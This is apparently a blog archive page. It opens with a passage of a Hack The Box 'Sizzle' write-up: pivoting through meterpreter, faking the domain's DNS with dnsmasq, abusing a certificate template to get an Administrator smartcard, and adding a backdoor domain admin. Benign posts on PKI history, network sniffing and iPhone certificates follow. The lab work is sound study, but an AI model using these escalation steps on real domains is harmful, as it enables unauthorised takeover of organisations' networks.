Note that the WinRM ports 5985 and 5986 remained forwarded ‘normally’ without proxychains socat all the time! So I am using one Windows box for WinRM, and I add another Windows box to the setup as the future ‘victim’ domain member.

I did not forward DNS as that would screw up the discovery of Kerberos and LDAP services: The Windows victim client will believe that my Kali box is the domain controller sizzle.htb.local, and it accessed it under my local 192.168.x.y address. When I would forward DNS queries to the true sizzle DC, it would respond with service records pointing to 10.10.10.103 … which the victim Windows box would not be able to locate. I tried some crazy things with ARP poisoning, but the solution is simpler: I set up dnsmasq as a fake DNS server on my Kali box and added all the required SRV records:

dnsmasq uses the dnsmasqhosts file instead of /etc/hosts plus settings in the dnsmasq.conf file that make the box the authoritative DNS server for htb.local

/etc/dnsmasqhosts

192.168.x.y sizzle.htb.local

/etc/dnsmasq.conf

addn-hosts=/etc/dnsmasqhosts
no-hosts

auth-zone=/htb.local
auth-server=/htb.local/192.168.x.y

srv-host=_ldap._tcp.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.Default-First-Site-Name._sites.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.dc._msdcs.htb.local,sizzle.htb.local,389
srv-host=_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.pdc._msdcs.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.gc._msdcs.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_gc._tcp.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_gc._tcp.Default-First-Site-Name._sites.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_kerberos._tcp.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kerberos._udp.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kerberos._tcp.Default-First-Site-Name._sites.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kerberos._tcp.dc._msdcs.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kpasswd._tcp.HTB.LOCAL,sizzle.htb.local,464
srv-host=_kpasswd._udp.HTB.LOCAL,sizzle.htb.local,464

Resources: List of the SRV records, how the locator process works. I am assuming that the standard name for the site was used – Default-First-Site-Name – which is confirmed by testing the record with nslookup as amanda, directly on sizzle. I omit the record containing the domain GUID though that can be found somewhere in AD (AD Sites and Services or adsiedit.msc).

I discovered some of the ports and records I had missed step by step, by sniffing the traffic on unsuccessful domain joins and net use attempts. For example, having received the info about the proper logon server, the client send an LDAP query over UDP 389 – easy to miss as an important port to be forwarded.

Joining a Windows client to the htb.local domain [>> Contents]

The victim client is a physical Windows 7 box. Redirecting the crypto token over RDP did work as well as connecting USB on a Windows VM – but I did not want to risk anything and rather use a physical USB connection.

On this Windows box I configure the internal IP address of Kali box as the only DNS server. dnsmasq returns all queries for the htb.local domain, and it also forwards other DNS queries to the internet.

I test with some of the SRV records (IP obfuscated):

nslookup
Default Server:  sizzle.htb.local
Address:  192.168.x.y

> sizzle.htb.local
Server:  sizzle.htb.local
Address:  192.168.x.y

Name:    sizzle.htb.local
Address:  192.168.x.y

> set query=SRV
> _kerberos._tcp.dc._msdcs.HTB.LOCAL
Server:  sizzle.htb.local
Address:  192.168.x.y

_kerberos._tcp.dc._msdcs.HTB.LOCAL      SRV service location:
          priority       = 0
          weight         = 0
          port           = 88
          svr hostname   = sizzle.htb.local
sizzle.htb.local        internet address = 192.168.x.y
> 

For completenes: I also add an LMHOSTS file for the domain HTB, and could thus see WINS-like names with nbtstat – but this is definitely not suffcient to locate the domain.

I join the machine to the domain using the GUI / Properties of My Computer, change computer name or domain. Enter the new domain:

Enter amanda’s credentials – she can add her box to the domain:

Welcome!

In parallel, I can check in the other Windows PC – in the PSSession – that my test machine has indeed been added to the domain!

[sizzle.htb.local]: PS C:\Users\amanda\Documents> get-adcomputer -filter *

DistinguishedName : CN=SIZZLE,OU=Domain Controllers,DC=HTB,DC=LOCAL
DNSHostName       : sizzle.HTB.LOCAL
Enabled           : True
Name              : SIZZLE
ObjectClass       : computer
ObjectGUID        : a4f7617b-9228-40b2-9e14-5b3aedb489bd
SamAccountName    : SIZZLE$
SID               : S-1-5-21-2379389067-1826974543-3574127760-1001
UserPrincipalName :

DistinguishedName : CN=TESTPC,CN=Computers,DC=HTB,DC=LOCAL
DNSHostName       :
Enabled           : True
Name              : TESTPC
ObjectClass       : computer
ObjectGUID        : 277cd1c8-0fd1-4816-a63e-bb0653c0ee59
SamAccountName    : TESTPC$
SID               : S-1-5-21-2379389067-1826974543-3574127760-3102
UserPrincipalName :

[sizzle.htb.local]: PS C:\Users\amanda\Documents>

Having recovered from the shock that this actually worked, I reboot the Windows 7 box and logon as amanda to the domain (and the PC) with her user name and password!

On the Kali box proxychains shows extensive communication over ports 88, 139, 445, 389,…, like this:

...
|S-chain|-<>-127.0.0.1:8088-<><>-10.10.10.103:445-<><>-OK
|S-chain|-<>-127.0.0.1:8088-<><>-10.10.10.103:88-<><>-OK
...

Summary of the solution so far [>> Contents]

As amanda, I confirm that could again run the MMCs that I already used before on the Windows attack DC – yes, I can again edit certificate templates and I can also see one more computer in AD Users and Computers :-)

  • Start hackthebox VPN on Kali.
  • Get a default User certificate for amanda once. It is persistent and will last until its or the CA’s expiry, not affected by box reset.
  • Forward WinRM ports to Windows box 1, start WinRM session.
  • Start a  simple shell, from there a meterpreter shell.
  • Start a socks proxy, and ioute traffic through the meterpreter session.
  • Forward all ports again from Kali to your test network using proxychains socat.
  • Setup dnsmasq on Kali tas fake htb.local server, host all SRV records.
  • On Windows box 2, configure your Kali’s internal IP as the only DNS server.
  • Join Windows box 2 to the domain htb.local as HTB\amanda
  • Logon to Windows box 2 as amanda
  • Edit the certificate template SSL to include required EKUs.
  • Prepare a CSR with the admin’s names.
  • Submit the file at /certsrv as amanda.
  • Import the certificate, export key and cert to a PFX, import it to a smartcard.

Finally: Using the Administrator’s token! [>> Contents]

Plug in the token and try net use! The smart card prompts for the PIN, and finally connects to c$ successfully!

C:\hackthebox>net use \\sizzle.htb.local\c$ /smartcard
Reading smart cards........
The following errors occurred reading the smart cards on the system:
No card on reader 2
No card on reader 3
No card on reader 4
No card on reader 5
Using the card in reader 1.  Enter the PIN:
The command completed successfully.

C:\hackthebox>dir \\sizzle.htb.local\c$
 Volume in drive \\sizzle.htb.local\c$ has no label.
 Volume Serial Number is 9C78-BB37

 Directory of \\sizzle.htb.local\c$

03.07.2018  17:22    <DIR>          Department Shares
02.07.2018  22:29    <DIR>          inetpub
02.12.2018  04:56    <DIR>          PerfLogs
26.09.2018  06:49    <DIR>          Program Files
26.09.2018  06:49    <DIR>          Program Files (x86)
11.07.2018  23:59    <DIR>          Users
06.05.2019  15:20    <DIR>          Windows
               0 File(s)              0 bytes
               7 Dir(s)  10.516.963.328 bytes free

C:\hackthebox>type \\sizzle.htb.local\C$\users\administrator\desktop\root.txt
91c58***************************
C:\hackthebox>

As amanda start a session as Administrator:

runas /smartcard cmd

Again the token asks for the PIN, and I finally have a shell!

\o/

Creating a (not really stealthy) backdoor admin [>> Contents]

I can now create another domain admin – I don’t even have to bother with powershell or net use as I could start any GUI tool from directly from that shell, e.g.

C:\Windows\system32\dsa.msc

Create a Test OU container and a Test User within in:

Add the user to some interesting groups:

Switch the user and logon as HTB\testuser. Now I have my own domain admin desktop!

 

Certificates and PKI. The Prequel.

Some public key infrastructures run quietly in the background since years. They are half forgotten until the life of a signed file has come to an end – but then everything is on fire. In contrast to other seemingly important deadlines (Management needs this until XY or the world will come to an end!) this deadline really can’t be extended. The time of death is included in the signed data since a long time.

The entire security ‘ecosystem’ changes while these systems sleep in the background. Now we have Let’s Encrypt (I was late to that party), HTTPS is everywhere, and the green padlock as an indicator of a secure site is about to die.

Recently I stumbled upon a whirlwind tour of the history of PKI and SSL/TLS – covering important events in the evolution of standards and technologies, from shipping SSLv2 in Netscape Navigator 1.1 in 1995 to Chrome marking HTTP pages as ‘not secure’ in 2018. Scrolling down the list of years I could not avoid waxing nostalgic. I had written about PKI before at length before, but this time I do what the Hollywood directors of blockbusters do – I write a prequel.

I remember the first times I created a Certificate Signing Request (CSR) and submitted it to a Certificate Authority (CA). It was well before 2000, and it was an adventure!

I was a scientist turned freelance IT consultant – I went from looking at Transmission Electron Microscope images to troubleshooting why Outlook did not start on small business owners’ computers. And I was daring enough to give trainings, based on the little I knew (with hindsight) about IT and networking. I also developed some classes from scratch – creating wiki-style training material, using Microsoft FrontPage 1998.

One class was  called networking and security of the like, and it was part of a vocational retraining curriculum – to turn former factory workers and admin assistants into computer technicians. For reasons I cannot remember I included a brief explanation of the RSA algorithm in my clunky FrontPage site. It was maybe a pretext to justify an exciting lab exercise: As the PKI history timeline shows, SSL was still rather new. Press releases by Austrian IT companies highlighted the military-grade protection from eavesdropping. It felt like Star Trek. One of the early Austrian National CAs offered ‘light’ test certificates. The description of the enrollment process was targeted to business users, but it was pure geek speak: A mysterious multi-step procedure explained in hacker terms like Secure Vault.

I don’t remember if my students found it that exciting or if the test enrolling a lots of certificates simultaneously did work so well at all. But I was hooked.

As a freelancer I started working with my former colleagues again – supporting the sciencists to subvert re-interpert the central IT department’s policies by setting up their own server, or by circumventing the firewall by dialing in to their own modem. This were the days of IT hype in the late 1990s before the dotcom bust. The research center had a new CEO with an IT background, and to get your projects approved you had to tack the label virtual onto anything. So I helped with creating a Virtual Materials Science Lab – which meant we used Microsoft Netmeeting.

Despite or because of such activities I also started working for the IT department. It was the time when The Cluetrain Manifesto told us that hyperlinks were subversive. As a ‘manager’ I should have disciplined shadow IT admins purchasing their own domains and running their shadow servers, but I could not stop tinkering with the web servers myself. It was also the time when I learned that to make things work in larger organizations – or a combination of several of those – you often need to social engineer someone.

We needed a SSL certificate – and I was the super qualified person for that task, based on my experience playing with the Secure Vault. But creating and submitting the CSR, and installing the certificate was the easy part. There were unexpected challenges:

The research center had a long legal name – 65 characters including the final dot in the indication of the legal entity. Common Names in X.509 certificates are limited to 64 characters, so I could not enter the final dot in IIS’s (Internet Information Server’s) wizard for CSRs. The legal name was cross-checked against the Dun&Bradstreet database. One would think that the first 64 characters of a peculiar German name would have been sufficient, but no. It took several phone calls – and faxes! – to prove to the US-based CA company that we were who we claimed to be.

The fact I called a CA company in the US might highlight a mistake: If I recall correctly Big CA had partners in Europe already at that time, but I missed that, or I wanted to talk to the mothership for some reason.

To purchase the certificate from the US-based company you needed a credit card, to be entered exactly when you submit the CSR. This process was disrupting the usual purchasing procedures and I had to social engineer somebody from the procurement department to join me in my adventure, bringing the corporate credit card.

The research center was a company owned 51% by government – so you had SAP and insane management deadlines as well as conferences and academic publication records. The Internet in general was still dominated by its academic roots. Not long ago, there had been a single web page listing All WWW servers in Austria, and that page was run by the academic internet backbone. Domain registration data were tied to a person, to the wrong person, or to the wrong entity – which came back to bite you later.

Fortunately the domain assigned to the SSL certificate belonged to us – so I did not have to  social engineer a DNS admin this time. But it was assigned to a person and not to the organization. The person was an employee in charge of the network, but how should you prove that? More faxes and phone calls were required to sort out the fine legal points.

I did not keep records of that period, so I don’t know if this web server is alive or if at least the domain still exists. Maybe unlikely, given the rapid decay of rotting links. But while researching history for this post – randomly googling for early versions of Microsoft’s web servers – I discovered interesting things. There is a small change it may be alive!

The first version of the Windows Certificate Authority had been released as an add-on to Windows NT 4, as part of the so-called Windows NT 4 Option Pack – the same add-on that also contained the webserver (IIS) itself. It was the time when I learned ASP programming by going online via dial-up and browsing through MSDN as quick as possible not to overspend my precious monthly online time.

I wanted to relive the setup of Internet Information Server 4.0 as and the Option Pack – and found lots of support articles and how-to’s, like this one.

However, I also found live websites like this:

This is only the setup CD, so no danger yet, but you can as well find sites with the welcome page of the operating web server online – including sample ASP applications – which I don’t show deliberately. (Image credits: Microsoft.)

I wonder why I had been frantically re-developing my websites in ASP.NET from scratch – ‘just because’ ASP was outdated technology, even though there were no known vulnerabilities and the sites were running on a modern operating system.

Time to quote from Peter Gutmann’s book Engineering Security:

A great many of today’s security technologies are “secure” only because no-one has ever bothered attacking them.

… which is also true for yesterday’s technology still online!

Bots, Like This! I am an Ardent Fan of HTTPS and Certificates!

This is an experiment in Machine Learning, Big Data, Artificial Intelligence, whatever.

But I need proper digression first.

Last autumn, I turned my back on social media and went offline for a few days.

There, in that magical place, the real world was offline as well. A history of physics museum had to be opened, just for us.

The sign says: Please call XY and we open immediately.

Scientific instruments of the past have a strange appeal, steampunk-y, artisanal, timeless. But I could not have enjoyed it, hadn’t I locked down the gates of my social media fortresses before.

Last year’ improved’ bots and spammers seem to have invaded WordPress. Did their vigilant spam filters feel a disturbance of the force? My blog had been open for anonymous comments since more than 5 years, but I finally had to restrict access. Since last year every commentator needs to have one manually approved comment.

But how to get attention if I block the comments? Spam your links by Liking other blogs. Anticipate that clickers will be very dedicated: Clicking on your icon only takes the viewer to your gravatar profile. The gravatar shows a link to the actual spammy website.

And how to pick suitable – likeable – target blog posts? Use your sophisticated artificial intelligence: If you want to sell SSL certificates (!) pick articles that contain key words like SSL or domain – like this one. BTW, I take the ads for acne treatment personally. Please stick to marketing SSL certificates. Especially in the era of free certificates provided by Let’s Encrypt.

Please use a different image for your different gravatars. You have done rather well when spam-liking the post on my domains and HTTPS, but what was on your mind when you found my post on hijacking orphaned domains for malvertizing?

Did statements like this attract the army of bots?

… some of the pages contain links to other websites that advertize products in a spammy way.

So what do I need to do to make you all like this post? Should I tell you that have a bunch of internet domains? That I migrated my non-blogs to HTTPS last year? That WordPress migrated blogs to HTTPS some time ago? That they use Let’s Encrypt certificates now, just as the hosting provider of my other websites does?

[Perhaps I should quote ‘SSL’ and ‘TLS’, too.]

Or should I tell you that I once made a fool of myself for publishing my conspiracy theories – about how Google ditched my blog from their index? While I actually had missed that you need to add the HTTPS version as a separate item in Google Webmaster Tools?

So I desperately need help with Search Engine Optimization and Online Marketing. Google shows me ads for their free online marketing courses on Facebook all the time now.

Or I need help with HTTPS (TLS/SSL) – embarrassing, as for many years I did nothing else than implementing Public Key Infrastructures and troubleshooting certificates? I am still debugging of all kinds weird certificate chaining and browser issues. The internet is always a little bit broken, says Sir Tim Berners-Lee.

[Is X.509 certificate a good search term? No, too nerdy, I guess.]

Or maybe you are more interested in my pioneering Search Term Poetry and Spam Poetry.  I need new raw material.

Like this! Like this! Like this!

Maybe I am going to even approve a comment and talk to you. It would not be the first time I fail the Turing test on this blog.

Don’t let me down, bots! I count on you!

Update 2018-02-13: So far, this post was a success. The elkemental blog has not seen this many likes in years.… and right now I noticed that the omnipresent suit bot also started to market solar energy and to like my related posts!

Update 2018-02-18: They have not given up yet – we welcome another batch of bots!

bots-welcome-experiment-success-2

Update 2018-04-01: They become more subtle – now they spam-like comments – albeit (sadly) not the comments on this article. Too bad I don’t display the comment likes – only I see them in the admin console ;-)

bots-welcome-experiment-success-3

Network Sniffing for Everyone – Getting to Know Your Things (As in Internet of Things)

Simple Sniffing without Hubs or Port Mirroring for the Curious Windows User
[Jump to instructions and skip intro]

Your science-fiction-style new refrigerator might go online to download the latest offers or order more pizza after checking your calendar and noticing that you have to finish a nerdy project soon.

It may depend on your geekiness or faith in things or their vendors, but I absolutely need to know more about the details of this traffic. How does the device authenticate to the external partner? Is the connection encrypted? Does the refrigerator company spy on me? Launch the secret camera and mic on the handle?

In contrast to what the typical hacker movie might imply you cannot simply sniff traffic all on a network even if you have physical access to all the wiring.

In the old days, that was easier. Computers were connected using coaxial cables:

10base2 t-pieceCommunications protocols are designed to deal with devices talking to any other devices on the network any time – there are mechanisms to sort out collisions. When computers want to talk to each other the use (logical) IP addresses that need to get translated to physical device (MAC) addresses. Every node in the network can store the physical addresses of his peers in the local subnet. If it does not know the MAC address of the recipient of a message already it shouts out a broadcasting message to everybody and learns MAC addresses. But packets intended for one recipient are still visible to any other party!

A hub does (did) basically the same thing as coaxial cables, only the wiring was different. My very first ‘office network’ more than 15 years ago was based on a small hub that I have unfortunately disposed.

Nowadays even the cheapest internet router uses a switch – it looks similar but works differently:

A switch minimizes traffic and collisions by memorizing the MAC addresses associated with different ports (‘jacks’). If a notebook wants to talk to the local server this packet is sent from the notebook to the switch who forwards it to that port the server is connected to. Another curious employee’s laptop could not see that traffic.

This is fine from the perspective of avoiding collisions and performance but a bad thing if you absolutely want to know what’s going on.

I could not resist using the clichéd example of the refrigerator but there are really more and more interesting devices that make outbound connections – or even effectively facilitate inbound ones – so that you can connect to your thing from the internet.

Using a typical internet connection and router, a device on the internet cannot make an unsolicited inbound connection unless you open up respective ports on your router. Your internet provider may prevent this: Either you don’t have access to your router at all, or your router’s external internet address is still not a public one.

In order to work around this nuisance, some devices may open a permanent outbound connection to a central ‘rendezvous server’. As soon as somebody wants to connect to the device behind your router, the server utilizes this existing connection – which is technically an outbound one, from the perspective of the device.

Remote support tools such as Teamviewer use technologies like that to allow helping users behind firewalls. Internet routers doing that: DLink calls their respective series Cloud Routers (and stylish those things have become, haven’t they?).

How to: Setup your Windows laptop as a sniffer-router

If you want to sniff traffic from a blackbox-like device trying to access a server on the internet you would need a hub which is very hard to get these days – you may find some expensive used ones on ebay. Another option is to use a switch that supports Port Mirroring: All traffic on the network is replicated to a specific port, and connecting to that with your sniffer computer you could inspect all the packets

But I was asking myself for the fun of it:

Is there a rather simple method a normal Windows user could use though – requiring only minimal investment and hacker skills?

My proposed solution is to force the interesting traffic to go through your computer – that is turning this machine into a router. A router connects two distinct subnets; so the computer needs two network interfaces. Nearly every laptop has an ethernet RJ45 jack and wireless LAN – so these are our two NICs!

I am assuming that the thing to be investigated rather has a wired connection than wireless LAN so we want…

  • … the WLAN adapter to connect to your existing home WLAN and then the internet.
  • … the LAN jack to connect to a private network segment for your thing. The thing will access the internet through a cascade of two routers finally.

Routing is done via a hardly used Windows feature experts will mock – but it does the job and is built-in: So-called Internet Connection Sharing.

Additional hardware required: A crossover cable: The private network segment has just a single host – our thing. (Or you could use another switch for the private subnet – but I am going for the simplest solution here.)

Software required: Some sniffer such as the free software Wireshark.

That’s the intended network setup (using 192.168.0.x as a typical internal LAN subnet)

|    Thing    |       |      Laptop Router      |      |Internet Router
|     LAN     |-cross-|     LAN     |    WLAN   |-WLAN-|Internal LAN
|192.168.137.2|       |192.168.137.1|192.168.0.2|      |192.168.0.1
  • Locate the collection of network adapters, in Windows 7 this is under
    Control Panel
    –Network and Internet
    —-View Network Status and Tasks
    ——Change Adapter Settings
  • In the Properties of the WLAN adapter click the Sharing tab and check the option Allow other network users to connect through this computer’s Internet connection.
  • In the drop-down menu all other network adapters except to one to be shared should be visible – select the one representing the RJ45 jack, usually called Local Internet Connection.

Internet Connection Sharing

  • Connect the RJ45 jack of the chatty thing (usually tagged LAN) to the LAN jack of your laptop with the crossover cable.
  • If it uses DHCP (most devices do), it will be assigned an IP address in the 192.168.137.x network. If it doesn’t i it needs a fixed IP address you should configure it for an address in this network with x other than 1. The router-computer will be assigned 192.168.137.1 and is the DHCP server, DNS server, and the default gateway.
  • Start Wireshark, click Capture…, Interfaces, locate the LAN adapter with IP address 192.168.137.1 and click Start

Now you see all the packets this device may send to the internet.

I use an innocuous example now:

On connecting a Samsung Blu-ray player, I see some interesting traffic:

Samsung bluray, packets

The box gets an IP address via DHCP (only last packet shown – acknowledgement of the address), then tries to find the MAC address for the router-computer 192.168.137.1 – a Dell laptop – as it needs to consult the DNS service there and ask for the IP address corresponding to an update server whose name is obviously hard-coded. It receives a reply, and the – ‘fortunately’ non-encrypted – communication with the first internet-based address is initiated.

Follow TCP stream shows more nicely what is going on:

Samsung bluray player wants to update

The player sends an HTTP GET to the script liveupdate.jsp, appending the model, version number of location in the European Union. Since the player is behind two routers – that is NAT devices – Samsung now sees this coming from my Austrian IP address.

The final reply is a page reading [NO UPDATE], and they sent me a cookie that is going to expire 3,5 years in the past ;-) So probably this does not work anymore.

As I said – this was an innocuous example. I just wanted to demonstrate that you never know what will happen if you can’t resist connecting your things to your local computer network. You might argue that normal computers generate even more traffic trying to contact all kinds of update servers – but in contrast to reverse engineering a ,lockbox of a thing you 1) can just switch on the sniffer and see that traffic without any changes to be made to the network and 2) as an owner of your computers you could on principle control it.

________________________________

Further reading:

Peer-to-Peer Communication Across Network Address Translators – an overview of different technique to allow for communications of devices behind NAT devices such as firewalls or internet routers.

Ethernet and Address Resolution Protocol (ARP) on Wikipedia

Sniffing Tutorial part 1 – Intercepting Network Traffic: Overview on sniffing options: dumb hubs, port mirroring, network tap.

Diffusion of iTechnology in Corporations (or: Certificates for iPhones)

[Jump to technical stuff]

Some clichés are true. One I found confirmed often is about how technologies are adopted within organizations: One manager meets another manager at a conference / business meeting / CIO event. Manager X show off the latest gadget and/or brags about presents a case-study of successful implementation of Y.

Another manager becomes jealous inspired, and after returning home he immediately calls upon his poor subordinates and have them implement Y – absolutely, positively, ASAP.

I suspect that this is the preferred diffusion mechanism for implementing SAP at any kind of organization or for the outsourcing hype (probably also the insourcing-again movement that followed it).

And I definitely know this works that way for iSomething such as iPhones and iPads. Even if iSomething might be not the officially supported standard. But no matter how standardized IT and processes are – there is always something like VIP support. I do remember vividly how I was one told that we (the IT guys) should not be so overly obliging when helping users –  unless I (the top manager) need something.

So trying to help those managers is the root cause for having to solve a nice puzzle: iThings need to have access to the network and thus often need digital certificates. Don’t tell me that certificates might not be the perfect solution – I know that. But working in some sort of corporate setting you are often not in the position to bring up these deep philosophical questions again and again, so let’s focus on solving the puzzle:

[Technical stuff – I am trying a new format to serve different audiences here]

Certificates for Apple iPhone 802.1x / EAP-TLS WLAN Logon

The following is an environment you would encounter rather frequently: Computer and user accounts are managed in Microsoft Active Directory – providing both Kerberos authentication infrastructure and LDAP directory. Access to Wireless LAN is handled by RADIUS authentication using Windows Network Protection Server, and client certificates are mandatory as per RADIUS policies.

You could require 802.1x to be done by either user accounts and/or machine accounts (though it is a common misunderstanding that in this way you can enforce a logon by 1) the computer account and then 2) the user account at the same machine.) I am now assuming that computers (only) are authenticated. This the iDevice needs to present itself as a computer to the logon servers.

Certificates contain lots of fields, and standards either don’t enforce clearly what should go into those fields and/or applications interpret standards in weird ways. Thus the pragmatic approach is to tinker and test!

This is the certificate design that works for iPhones according to my experience:

  • We need a ‘shadow account’ in Active Directory whose properties will match fields in the certificates. Two LDAP attributes needto be set
    1. dnsHostName: machine.domain.com
      This is going to be mapped onto the DNS name in the Subject Alternative Name of the certificate.
    2. servicePrincipalNames: HOST/machine.domain.com
      This makes the shadow account a happy member of the Kerberos realm.

    According to my tests, the creation of an additional name mapping – as recommended here – is not required. We are using Active Directory default mapping here – DNS machine names work just as user’s UPNs (User Principal Name – the logon name in user@dmain syntax. See e.g. Figure 21 – Certificate Processing Logic – in this white paper for details.)

  • Extensions and fields in the certificate
    1. Subject Alternative Name: machine.domain.com (mapped to the DNS name dnsHostName in AD)
    2. Subject CN: host/machine.domain.com. This is different from Windows computers – as far as I understood what’s going on from RADIUS logging the Apple 802.1x client sends the string just as it appears in the CN. Windows clients would add the prefix host/ automatically.
    3. If this is a Windows Enterprise PKI: Copy the default template Workstation Authentication, and configure the Subject Name as to be submitted with the Request. The CA needs to accept custom SANs via enabling the  EDITF_ATTRIBUTESUBJECTALTNAME2 flag. Keys need to be configured as exportable to carry them over to the iDevice.
  • Create the key, request and certificate on a dedicated enrollment machine. Note that this should be done in the context of the user rather than the local machine. Certificates/key could be transported to another machines as PKCS#12 (PFX files).
  • Import the key and certificate to the iPhone using the iPhone Configuration Manager – this tools allows for exporting directly from the current user’s store. So if the user does not enroll for those certificates himself (which makes sense as the enrollment procedure is somewhat special, given the custom names), the PFX files would be first imported to the user’s store and then exported from there to the iPhone.

The point I like to stress in relation to certificates is that logon against AD is based on matching strings – containing the DNS names – not on a binary comparison of a file presented by the client versus a certificate file in the directory.

I have encountered that misconception often as there is an attribute in AD – userCertificate – that is actually designed for holding users’ (or machines’) certificates. But this is more of a Alice-tries-to-get-Bob’s-public-key-phonebook-style attribute, and it is not intended to be used for authentication but rather for encryption – Outlook is searching for S/MIME e-mail recipients’ public keys there. Disclaimer: I cannot vouch for any custom application that may exist.

Authentication is secure nonetheless as the issuing CA’s certificate needs to be present in a special LDAP object, the so-called NTAuth object in Active Directory’s Configuration Container, and per default it can only be edited by Enterprise Admins – the ‘root admins’ of AD. In addition you have to configure the CA for accepting arbitrary SANs in requests.

IPhone Fashion Valley

Happy iPhone users with their iPhones, when the product was released in 2007. I have never owned any iThing so I need to borrow an image from Wikimedia (user 1DmkIIN).

The Strange World of Public Key Infrastructure and Certificates

An e-mail discussion related to my recent post on IT security has motivated me to ponder about issues with Public Key Infrastructure once more. So I attempt – most likely in vain – to merge a pop-sci introduction to certificates with sort of an attachment to said e-mail discussion.

So this post might be opaque to normal users and too epic and introductory for security geeks.

I mentioned the failed governmental PKI pilot project in that post – a hardware security device destroying the key and there was no backup. I would have made fun of this – hadn’t I experienced it often that it is the so-called simple processes and logistics that can go wrong.

I didn’t expect to find such a poetic metaphor for “security systems” rendered inaccessible. Padlocks in Graz, Austria. Legend has it that lovers attaching a padlock to the bridge and throwing the key into the water will be together forever.

When compiling the following I had in mind what I call infrastructure PKIs – company-internal systems to be used mainly for internal purposes and very often for use by devices rather than by humans. (Ah, the internet of things.)

Issues often arise due to a combination of the following:

  • Human project resources assigned to such projects are often limited.
  • Many applications simply demand certificates so you need to create them.

Since the best way to understand certificates is probably by comparing them to passports or driver licenses I will nonetheless use one issued to me as a human life-form:

Digital Certificate

In Austria the chipcards used to authorize you to medical doctors as a patient can also be used as digital ID cards. That is, the card’s chip also holds the cryptographic private key, and the related certificate ties your identity as a citizen to the corresponding public key. A certificate is a file digitally signed by a Certificate Authority which in this case has the name a-sign-Token-03. The certificate can be searched for in the directory (German site).

Digital X.509 Certificate: Details

The Public key related to my identity as a citizen (or better a database record representing myself as a citizen). As a passport, the certificate has an end of life and requires renewal.

Alternatives to Hardware Security Modules

An HSM is protecting that sacred private key of the certification authority. It is often a computer, running a locked-down version of an operating system, and it is equipped with sensors that detect and attempt to access the key store physically – it should actually destroy the key rather than having an attacker gain access to it.

It allows for implementing science-fiction-style (… Kirk Alpha 2Spock Omega 3 …) split administration and provides strong key protection that cannot be provided if the private key is stored in software – somewhere on the hard disk of the machine running the CA.

Modern HSMs have become less cryptic in terms of usage but still: It is a hardware device not used on a daily basis, and requires additional training and management. Storage of physical items like the keys for unlocking the device and the corresponding password(s) is a challenge as is keeping the know-how of admins up to date.

Especially for infrastructure CAs I propose a purely organizational split administration for offline CAs such as a Root CA: Storing the key in software, but treating the whole CA machine as a device to be protected physically. You could store the private key of the Root CA or the virtual machine running the Root CA server on removable media (and at least one backup). The “protocol” provides spilt administration: E.g. one party has the key to the room, the other party has the password to decrypt the removable medium. Or the unencrypted medium is stored in a location protected by a third party – which in turn does only allow two persons to enter the room together.

But before any split administration is applied an evaluation of risks it should be made sure that the overall security strategy does not look like this:

Steps to nowhere^ - geograph.org.uk - 666960

From the description on Wikimedia: The gate is padlocked, though the fence would not prevent any moderately determined person from gaining access.

You might have to question the holy order (hierarchy) and the security implemented at the lowest levels of CA hierarchies.

Hierarchies and Security

In the simplest case a certification authority issues certificates to end-entities – users or computers. More complex PKIs consist of hierarchies of CAs and thus tree-like structures. The theoretical real-world metaphor would be an agency issuing some license to a subordinate agency that issues passports to citizens.

Chain of certificates associated with this blog

Chain of certificates associated with this blog: *.wordpress.com is certified by Go Daddy Secure Certification Authority which is in turn certified by Go Daddy Class 2 Certification Authority. The asterisk in the names makes it usable with any wordpress.com site – but it defies the purpose of denoting one specific entity.

The Root CA at the top of the hierarchy should be the most secure as if it is compromised (that is: it’s private key has – probably – been stolen) all certificates issued somewhere in the tree should be invalidated.

However, this logic only makes sense:

  • if there is or will with high probability be at least a second Issuing CA – otherwise the security of the Issuing CA is as important as that of the Root CA.
  • if the only purpose of that Root CA is to revoke the certificate of the Issuing CA. The Root CA’s key is going to sign a blacklist referring to the Issuing CA. Since the Root should not revoke itself its key signing the revocation list should be harder to compromise than the key of the to-be-revoked Issuing CA.
Certificate Chain

The certificate chain associated with my “National ID” certificate. Actually, these certificates stored on chipcards are invalidated every time the card (which serves another purpose primarily) is retired as a physical item. Invalidation of tons of certificates can create other issues I will discuss below.

Discussions of the design of such hierarchies focus a lot on the security of the private keys and cryptographic algorithms involved

But yet the effective security of an infrastructure PKI in terms of Who will be able to enroll for certificate type X (that in turn might entitle you to do Y) is often mainly determined by typical access control lists in databases or directories system that are integrated with an infrastructure PKI. Think would-be subscribers logging on to a web portal or to a Windows domain in order to enroll for a certificates. Consider e.g. Windows Autoenrollment (licensed also by non-Windows CAs) or the Simple Certificate Enrollment Protocol used with devices.

You might argue that it should be a no-no to make allegedly weak  software-credential-based authentication the only prerequisite for the issuance of certificates that are then considered strong authentication. However, this is one of the things that distinguish primarily infrastructure-focused CAs from, say, governmental CAs, or “High Assurance” smartcard CAs that require a face-to- face enrollment process.

In my opinion certificates are often deployed because their is no other option to provide platform-independent authentication – as cumbersome as it may be to import key and certificate to something like a printer box. Authentication based on something else might be as secure, considering all risks, but not as platform-agnostic. (For geeks: One of my favorites is 802.1x computer authentication via PEAP-TLS versus EAP-TLS.)

It is finally the management of group memberships or access control lists or the like that will determine the security of the PKI.

Hierarchies and Cross-Certification

It is often discussed if it does make sense to deploy more intermediate levels in the hierarchy – each level associated with additional management efforts. In theory you could delegate the management of a whole branch of the CA tree to different organizations, e.g. corresponding to continents in global organizations. Actually, I found that the delegation argument is often used for political reasons – which results in CA-per-local-fiefdom instead of the (in terms of performance much more reasonable) CA-per-continent.

I believe the most important reason to introduce the middle level is for (future) cross-certification: If an external CA cross-certifies yours it issues a certificate to your CA:

Cross Certification

